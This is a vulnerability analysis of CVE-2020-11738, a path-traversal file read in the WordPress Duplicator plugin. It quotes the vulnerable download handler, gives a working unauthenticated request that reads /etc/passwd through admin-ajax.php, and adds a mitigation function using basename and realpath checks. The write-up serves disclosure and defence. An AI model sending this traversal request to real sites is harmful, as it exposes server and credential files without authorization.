# WordPress Duplicator duplicator.php Arbitrary File Read Vulnerability CVE-2020-11738

## Vulnerability description

The WordPress Duplicator plugin does not validate the file name used for downloads, which results in an arbitrary file read vulnerability.

## Affected versions

```
Duplicator <= v1.3.26
```

## Plugin name

Duplicator https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip

## Reproduction

First, look at the registered AJAX actions that require no authentication in `wp-content/plugins/duplicator/ctrls/class.web.services.php`

![](images/202205241332267.png)

Here `wp_ajax_nopriv_duplicator_download` maps to the function named `duplicator_download`

![](images/202205241332007.png)

```php
public static function duplicator_download()
{
    // sanitize_text_field() strips tags and whitespace but leaves "../" intact
    $file = sanitize_text_field($_GET['file']);
    // User input is concatenated straight onto the snapshot directory path
    $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
    // Process download
    if(file_exists($filepath)) {
        // Clean output buffer
        if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
            @ob_clean();
        }
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($filepath));
        flush(); // Flush system output buffer
        try {
            $fp = @fopen($filepath, 'r');
            if (false === $fp) {
                throw new Exception('Fail to open the file '.$filepath);
            }
            while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                echo $data;
            }
            @fclose($fp);
        } catch (Exception $e) {
            readfile($filepath);
        }
        exit;
    } else {
        wp_die('Invalid installer file name!!');
    }
}
```

As you can see, the handler takes the `file` parameter and concatenates it into `$filepath`. Debugging shows that `DUPLICATOR_SSDIR_PATH` is the `wp-snapshots` directory; `file` is attacker-controlled and not filtered, so the handler reads arbitrary files.

```
/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
```

![](images/202205241334750.png)
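The mitigation, as an added example that is neither the plugin's own code nor its upstream fix: the download handler should accept only a bare file name and verify that the resolved path stays inside the snapshot directory. The helper name `duplicator_resolve_download_path` and the `$baseDir` parameter (standing in for `DUPLICATOR_SSDIR_PATH`) are assumptions; the sample directory and file are constructed for the demo.

```php
<?php
// Added example, not Duplicator's code. Returns the real path of a snapshot
// file that is safe to serve, or false if the request must be rejected.
function duplicator_resolve_download_path(string $file, string $baseDir)
{
    // Only a bare file name is acceptable: no separators, no "..", no NUL.
    // sanitize_text_field() alone does not enforce any of this.
    if ($file === '' || $file !== basename($file) || strpos($file, "\0") !== false) {
        return false;
    }
    $realBase = realpath($baseDir);
    if ($realBase === false) {
        return false;
    }
    // realpath() resolves symlinks and "..", so a symlinked name pointing
    // outside the directory is caught by the prefix check below.
    $realPath = realpath($realBase . DIRECTORY_SEPARATOR . $file);
    if ($realPath === false || !is_file($realPath)) {
        return false;
    }
    if (strpos($realPath, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $realPath;
}

// Constructed demo: a temporary snapshot directory with one backup archive.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dup_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'backup.zip', 'constructed sample');

$legit = duplicator_resolve_download_path('backup.zip', $base);
$traversal = duplicator_resolve_download_path('../../../../../etc/passwd', $base);
echo 'backup.zip accepted: ', var_export($legit !== false, true), PHP_EOL;
echo 'traversal accepted:  ', var_export($traversal !== false, true), PHP_EOL;

unlink($base . DIRECTORY_SEPARATOR . 'backup.zip');
rmdir($base);
```

In the real handler the return value would replace `$filepath`, and a `false` result should take the existing `wp_die('Invalid installer file name!!')` branch.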